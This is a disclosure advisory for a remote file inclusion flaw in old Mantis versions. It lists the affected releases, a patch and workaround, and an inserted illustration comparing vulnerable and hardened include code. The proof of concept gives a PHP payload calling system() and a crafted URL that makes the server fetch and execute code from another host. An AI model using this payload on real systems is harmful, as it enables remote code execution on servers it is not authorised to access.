2002-04 Arbitrary code execution vulnerability in Mantis
Last Modified: December 23, 2006 04:12AM
(Version 0.15.3 till 0.17.3)
Description

0. Table of Contents

1. Introduction
2. Summary / Impact analysis
3. Affected versions
4. Workaround / Solution
5. Proof of Vulnerability
6. Credit
7. Contact details

1. Introduction

Mantis is an open-source, web-based bug-tracking system, written in PHP, which
uses the MySQL database server. It is being actively developed by a small
group of developers and is considered to be in the beta stage.

2. Summary / Impact analysis

Mantis includes code which cooperates with JpGraph to generate some
statistical graphs. Some of this code is stored in an include file,
summary_graph_functions.php. This file takes care of loading the JpGraph
library, using an include() statement.

The path to the JpGraph library is stored in the configuration file.
However, summary_graph_functions.php does not load the configuration file,
but expects other scripts to have done that before including
summary_graph_functions.php.

The vulnerability arises when summary_graph_functions.php is requested directly
in a browser: because no configuration file has been loaded, any malicious user
can execute arbitrary PHP code as the webserver user by setting $g_jpgraph_path
to a local path or a URL.
This vulnerability has been closed in Mantis 0.17.4.

3. Affected versions

The following versions are known to be affected:
Mantis 0.17.3
Mantis 0.17.2
Mantis 0.17.1
Mantis 0.17.0
Mantis 0.16.1
Mantis 0.16.0
Mantis 0.15.12
Mantis 0.15.11
Mantis 0.15.10
Mantis 0.15.9
Mantis 0.15.8
Mantis 0.15.7
Mantis 0.15.6
Mantis 0.15.5
Mantis 0.15.4
Mantis 0.15.3

The following versions are known to be unaffected:
Mantis 0.17.4a
Mantis 0.17.4
Any version below Mantis 0.15.3

4. Workaround / Solution

Mantis 0.17.4 adds various checks which prevent this vulnerability.
All users are recommended to upgrade to this version as soon as possible.

If an upgrade is not possible, the vulnerability can be closed by inserting
the following lines at the top of summary_graph_functions.php:

// Refuse to run if the library path arrives from the request rather than the config
if ( isset($HTTP_GET_VARS['g_jpgraph_path'])
  || isset($HTTP_POST_VARS['g_jpgraph_path'])
  || isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) {
    exit;
}
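The include pattern described in section 2, placed beside a hardened form of the kind section 4 alludes to, as an added illustration that is not code from Mantis or from this advisory. The constant MANTIS_CONFIG_LOADED, the $config array and the allowed-root check are assumptions made for the example; jpgraph.php is taken as the library entry point.

```php
<?php
// Added example, not Mantis code. Assumes register_globals-era PHP for the
// vulnerable function and a config array plus entry-point constant for the fix.

// --- Vulnerable pattern (section 2) ---
// summary_graph_functions.php expected $g_jpgraph_path to be set by a script
// that had already loaded the configuration. With register_globals on, a
// direct request carrying g_jpgraph_path populates the global instead, and
// include() loads and executes whatever that path or URL serves.
function load_jpgraph_vulnerable() {
    global $g_jpgraph_path;
    include($g_jpgraph_path . 'jpgraph.php');
}

// --- Hardened pattern ---
// 1. Refuse to run unless the real entry script has loaded the configuration.
// 2. Take the path from the configuration, never from a request-populated global.
// 3. Accept only an existing local directory under an allowed root; reject URLs.
function jpgraph_dir_is_safe($path, $allowed_root) {
    if (!is_string($path) || strpos($path, '://') !== false) {
        return false;                     // stream wrappers (http://, ftp://) never valid
    }
    $real = realpath($path);
    $root = realpath($allowed_root);
    if ($real === false || $root === false || !is_dir($real)) {
        return false;                     // must exist and be a directory
    }
    // must be the allowed root itself or a subdirectory of it
    return $real === $root || strpos($real, $root . DIRECTORY_SEPARATOR) === 0;
}

function load_jpgraph_hardened(array $config, $allowed_root) {
    if (!defined('MANTIS_CONFIG_LOADED')) { // illustrative name, set by the entry script
        exit;                               // direct request to this include file: stop
    }
    $path = isset($config['jpgraph_path']) ? $config['jpgraph_path'] : '';
    if (!jpgraph_dir_is_safe($path, $allowed_root)) {
        trigger_error('jpgraph_path is not an allowed local directory', E_USER_ERROR);
    }
    require_once rtrim($path, '/\\') . DIRECTORY_SEPARATOR . 'jpgraph.php';
}
```

Turning register_globals off removes the request-to-variable path entirely; the directory check remains useful against a misconfigured or tampered configuration file.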

5. Proof of Vulnerability

To exploit this vulnerability, an attacker only has to store the PHP code
(s)he wishes to execute in a text file, make this available on a webserver
accessible by the Mantis installation, and point the $g_jpgraph_path variable
to that location.

For example, we create a file with the following content:
<?php system('ls'); exit; ?>

We make this file available on a webserver, for example at
http://server.mynetwork.net/listings.txt
If the Mantis installation does not have access to the internet, the file
should be stored on an internal server.

We then point our browser to
http://mantis.server.com/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fserver.mynetwork.net%2Flistings.txt%3F

This will execute the following call:
include('http://server.mynetwork.net/listings.txt?jpgraph.php');

This instructs PHP to download listings.txt and parse it as a PHP script. In
this case, the browser should print a file listing of the current directory.

6. Credit

This vulnerability was reported by Joao Gouveia (tharbad@kaotik.org).

7. Contact details

The latest version of Mantis is always available from:
http://www.mantisbt.org/
The current version is 1.0.6, which can be downloaded from
http://www.mantisbt.org/download.php

If you have any questions about this vulnerability, or wish to report
another, you can report it as a private issue on:
http://www.mantisbt.org/bugs/

The latest version of this and other advisories can be found at:
http://www.mantisbt.org/manual/

Last updated: Fri, 21 Nov 2008 - 9:28:09